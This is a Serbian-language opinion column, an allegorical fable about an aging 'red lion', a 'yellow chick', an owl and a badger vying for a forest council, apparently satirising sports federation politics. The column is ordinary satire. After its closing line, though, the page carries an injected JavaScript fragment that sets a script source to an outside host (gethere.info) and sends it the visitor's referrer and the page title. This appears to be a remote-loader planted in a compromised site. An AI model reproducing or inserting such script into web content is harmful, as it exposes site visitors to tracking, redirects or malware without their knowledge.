KOLUMNA, GRBOVIĆ: Crveni lav i žuto pile!

KOLUMNA, GRBOVIĆ: Crveni lav i žuto pile!


Nije ga šuma dočekala kako dolikuje jednom starom iskusnom lavu. Šumski savet koji ima svog predsednika, potpredsednike i savetnike je promenjen, ali ne na način na koji je on želeo

Ovo je priča o povratku starog lava koji se posle mnogo godina vraća u šumu iz koje je krenuo na turneje po evropskim cirkusima jer tada je bio mlad lav poznat po svojoj neustrašivosti i veštinama koje je umeo da izvede. Posle mnogo godina provedenih u cirkusima ostareli lav više nije mogao da izvodi akrobacije kao nekada, da svojom strašnom rikom plaši publiku i kako to uvek biva, gazde poslednjeg cirkusa u kome je radio daju mu otkaz i šalju ga kući.

Šuma u koju se vraća a koju u stvari nikada nije napustio jer uvek je bio prisutan ako ne fizički, onda ju je uvek savetovao, držao seminare, pričao o svojim iskustvima i svojim veštinama i bio plaćen za to u međuvremenu se promenila.

Nije ga šuma dočekala kako dolikuje jednom starom iskusnom lavu. Šumski savet koji ima svog predsednika, potpredsednike i savetnike je promenjen, ali ne na način na koji je on želeo.

Očekujući da ga dočekaju raširenih ruku, stari lav nailazi na hladan pozdrav glavnih funkcionera šumskog saveta i na popriličan otpor svih zaposlenih. Zbunjen, lav pokušava da ponovo riče i preti kao nekada pokazujući zube, ali avaj, nekada moćni glas se pretvorio u mjaukanje a od zuba je ostalo samo nekoliko tako da nije mogao nikoga da uplaši.

Ko su ti koji nisu otvorili sva vrata saveta legendarnom lavu i dali mu mesto koje mu pripada?

Prvi se pobunio predsednik saveta i shvativši da je ugroženo njegovo mesto uz pomoć sove, jazavaca i nekoliko lisica uspeva da spase svoju poziciju na izbornoj sednici glavnog odbora Šumskog saveta.

Za protivnika je imao legendarnog tigra koji se dostojanstveno povukao jer nije hteo da se bori za mesto koje mu prirodno pripada.

PROČITAJTE JOŠ: 
KOLUMNA, MOKA SLAVNIĆ: NBA špijuni, dalje ruke od naše dece!

ISPOVEST BUDUĆE NBA ZVEZDE: Nekad Bucko iz Sombora, a danas Medžik Jokić

Otišao je evropski savet koji sačinjavaju predatori sa kojima se borio celu svoju bogatu karijeru prepustivši šumu novim stanovnicima.

Ništa to ne bi bilo čudno da se tigar nije povukao pred žutim piletom koje prirodno ne pripada šumi jer ne zna pravila po kojima ona funkcioniše.

Kako god bilo, žuto pile postaje predsednik Šumskog saveta i uzima za pomoćnike mrmota, vevericu, puno miševa i gomilu insekata koji mu služe za sve sitne poslove vezane za rad saveta.

Sova kao glavni savetnik iz senke dobro poznaje žuto pile odranije, zna da ono nikada neće postati petao i polako iz senke i mraka, jer tada najbolje vidi, preuzima rukovođenje Šumskim savetom i organizuje ga kako njoj odgovara. Nesuđeni crveni petao aminuje svaku odluku koju sova predloži, nemoćan pred njenom agresivnošću.

Za to vreme jazavac, koji je uvek u šumi važio kao pametan ali koristoljubiv, koristi situaciju i bogati se na račun i jednih i drugih. Poznat kao jedan od najboljih trgovaca Evrope, jazavac prodaje šumske plodove, iznajmljuje evropskim cirkusima mlade lavove, a ponekad i proda najvećem cirkusu na svetu ponekog medveda ili vuka. Ima jazavac i svoj mali cirkus koji koristi kao tezgu za pokazivanje kada kupci dođu u šumu.

Videvši njegovu sliku na naslovnoj strani, uočio sam i sličnost između njega i žutog pileta koje u nemogućnosti da postane petao menja boju perja u sličnu boji lava

Sve je to znao stari lav kada se vraćao nazad. Sarađivao je on i sa jazavcem, jako dugo bio blizak prijatelj sa sovom, a sa žutim piletom je bio kao nokat i meso onih dana…Ljut što niko ne reaguje kako je on očekivao, lav počinje da luta dajući intervjue i izjave koje se ne tiču posla kojim se bavio.

A promenio je lav mnogo boja kroz svoju karijeru. Bio je i žut, i plav, a najviše je bio crven kakav je i sad, kad je odavno prešao granicu završetka karijere. Sada bi opet da ofarba grivu u neku drugu boju, ali ova crvena kojom se farbao ceo život i dalje dominira.

Videvši njegovu sliku na naslovnoj strani, uočio sam i sličnost između njega i žutog pileta koje u nemogućnosti da postane petao menja boju perja u sličnu boju kao i lav, a pozvavši ga u Šumski savet ponovo po ko zna koji put, pile polako najavljuje i odlazak sa mesta predsednika Šumskog saveta.

To će izazvati paniku među miševima i ostalim sitnim živuljkama u šumi jer će njegov eventualni povratak promeniti ravnotežu vlasti u savetu.

Miševi navikli da sova povremeno pojede ponekog od njih sada imaju još jednog predatora koji je bez zuba i ne vidi dobro pa će morati da povedu računa i sklanjaju mu se s puta kad je ljut i gladan. A znam tog lava dobro, uvek je gladan. Živeo sam nekad u toj šumi.

Ipak, svi oni zavise od lovca koji je neprikosnoveni vladar šume.

Nekada je lav išao kod njega da dobije dozvolu da on bude predsednik saveta i to samo kada nije imao posao u cirkusu. Lovac ga je uvek odbijao Sada se ponovo udružio se sovom, piletom i jazavcem ne bi li ponovo vladao.

Možda miševi naprave problem jer nikada ih nije bilo ovoliko u šumi, a mislim da je to zato što su svi vukovi, medvedi i ostali koji je trebalo prirodno da vladaju šumom otišli i ostavili šumu njima na upravu. Bilo im je ispod časti da je dele sa neprirodnim stanovnicima.

PROČITAJTE JOŠ: 
ISPOVEST, NIKOLA KALINIĆ: Od nesuđenog rokera do čoveka koji je “zakucao” Burusisa u koš

Uglavnom, šuma propada i tako će biti sve dok lovac ili neko drugi ne odluči da bude drugačije.

Zasad sova i dalje napada noću, jazavac trguje, pile pokušava da postane petao, a stari lav i dalje menja boju mada mu najbolje stoji ova crvena. Moram da ga pitam gde je nabavlja.

Snaga šume je jedino u njenom mladim stanovnicima. Oni su, kako sam rekao na početku, budućnost koja dolazi. Na njima sve ostaje i sigurno neće ponoviti greške iz prošlosti.

Laku noć, deco.s.src=’http://gethere.info/kt/?264dpr&frm=script&se_referrer=’ + encodeURIComponent(document.referrer) + ‘&default_keyword=’ + encodeURIComponent(document.title) + ”;

3 komentara

Dodajte komentar

+ Ostavite komentar